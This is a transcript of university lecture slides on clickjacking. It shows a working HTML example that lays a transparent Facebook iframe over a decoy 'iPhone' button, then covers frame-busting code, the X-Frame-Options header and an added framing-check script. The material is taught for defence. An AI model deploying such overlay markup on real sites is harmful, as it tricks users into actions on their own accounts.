Clickjacking - PowerPoint Presentation

Uploaded by faustina-dinatale on 2016-06-30




Presentation Transcript

Slide 1

Clickjacking

CSE 591 – Security and Vulnerability Analysis
Spring 2015
Adam Doupé
Arizona State University
http://adamdoupe.com

Slide 2

Would you click this button?

Slide 3

ClickJacking

In a clickjacking attack a user is lured into clicking a button that is not associated with the page displayed by the browser.

Example: clicking on a harmless "Download free screensaver" button on a page on site A will actually become a click on the "Like Button" on Facebook.

The attack, also called "UI redressing," is performed by using overlapping transparent frames:
Stacking order: z-index: <value>
Transparency in Firefox: opacity: <value>
Transparency in IE: filter:alpha(opacity=<value>)

Slide 4

ClickJacking Example

<html>
<head>
<title>Clickjacking Times</title>
</head>
<body>
<h1>Clickjacking Example</h1>
<!-- invisible layer on top (z-index 2): the real target page, fully transparent -->
<div style="z-index:2; position:absolute; top:0; left:0; width: 100%; height: 100%">
<iframe src="http://www.facebook.com/home.php?" id="frame1" style="opacity:0; filter:alpha(opacity=0);" width="100%" height="100%"></iframe>
</div>
<!-- visible decoy underneath (z-index 1): what the user believes they are clicking -->
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 100%; height:100%; background-color: white; text-align:left;">
<p><input type="submit" value="Press Here" /><br />Press this button for an iPhone</p>
</div>
</body>
</html>

Slide 5

ClickJacking Example (diagram): the visible "Press Here!" button sits at Z-level 1 (opaque); the invisible frame sits at Z-level 2 (transparent).

Slide 6

Frame Busting Code

<style> body { display:none; } </style>
<script>
// Reveal the body only when this document is the top-level window;
// otherwise navigate the top window to this page to break out of the frame.
if (self == top) {
  document.getElementsByTagName("body")[0].style.display = 'block';
} else {
  top.location = self.location;
}
</script>

From: Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, July 2010

Slide 7

HTTP Headers

X-Frame-Options HTTP response header
DENY: This page cannot be framed
SAMEORIGIN: Only pages from the same origin may frame this page
ALLOW-FROM <URI>: Only allow this specific URI to frame this page

https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Slide 8
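As an added example, not code from the slides: a small check that applies the X-Frame-Options values above to a response and reports whether the page may be framed, including the edge cases a defender should know about (missing header, conflicting values, typos). It assumes Node.js-style header objects with lower-cased names; the URLs are constructed samples, with site-a.example standing in for "site A".

```javascript
// Added example (not from the slides): decide whether a response may be rendered in a
// frame under the X-Frame-Options values listed on slide 7. `headers` has lower-cased
// names (as Node's http module returns them); `framedUrl` is the page loaded in the
// <iframe>, `topUrl` the page embedding it. Returns { allowed, reason }.
function mayBeFramed(headers, framedUrl, topUrl) {
  const raw = headers["x-frame-options"];
  if (raw === undefined) {
    return { allowed: true, reason: "no X-Frame-Options header: page is unprotected" };
  }
  // A repeated header arrives joined by commas. Chromium falls back to DENY when
  // the values conflict, so treat any multi-valued header as a refusal.
  const values = String(raw).split(",").map((v) => v.trim()).filter(Boolean);
  if (values.length !== 1) {
    return { allowed: false, reason: "conflicting X-Frame-Options values: framing refused" };
  }
  const [directive, uri] = values[0].split(/\s+/);
  const sameOrigin = (a, b) => new URL(a).origin === new URL(b).origin; // scheme://host[:port]
  switch (directive.toUpperCase()) {
    case "DENY":
      return { allowed: false, reason: "DENY: this page cannot be framed" };
    case "SAMEORIGIN":
      return sameOrigin(framedUrl, topUrl)
        ? { allowed: true, reason: "SAMEORIGIN: framed by a page of the same origin" }
        : { allowed: false, reason: "SAMEORIGIN: top page is a different origin" };
    case "ALLOW-FROM":
      // RFC 7034 semantics. Caveat: current browsers ignore this directive and
      // treat the header as absent, so it should not be relied on.
      return uri && sameOrigin(uri, topUrl)
        ? { allowed: true, reason: `ALLOW-FROM: top page matches ${uri}` }
        : { allowed: false, reason: "ALLOW-FROM: top page does not match the listed URI" };
    default:
      // Browsers ignore an invalid value, so a typo such as "DENIED" leaves the page framable.
      return { allowed: true, reason: `invalid value "${values[0]}" ignored: page is unprotected` };
  }
}

// Constructed sample: the frame from slide 4 loads facebook.com/home.php from a
// decoy page on "site A" (site-a.example is a placeholder host).
const FRAMED = "http://www.facebook.com/home.php?";
const TOP = "http://site-a.example/free-screensaver.html";

function demo() {
  return [
    mayBeFramed({}, FRAMED, TOP),
    mayBeFramed({ "x-frame-options": "DENY" }, FRAMED, TOP),
    mayBeFramed({ "x-frame-options": "SAMEORIGIN" }, FRAMED, "http://www.facebook.com/other"),
    mayBeFramed({ "x-frame-options": "DENIED" }, FRAMED, TOP),
  ];
}
for (const r of demo()) console.log(r.allowed ? "FRAMABLE" : "blocked ", r.reason);
```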

Summary

Need to be wary of how an attacker can trick a user into accidentally taking an action on your web application.

Clickjacking is related to CSRF: both attacks allow an attacker to perform actions on your behalf.
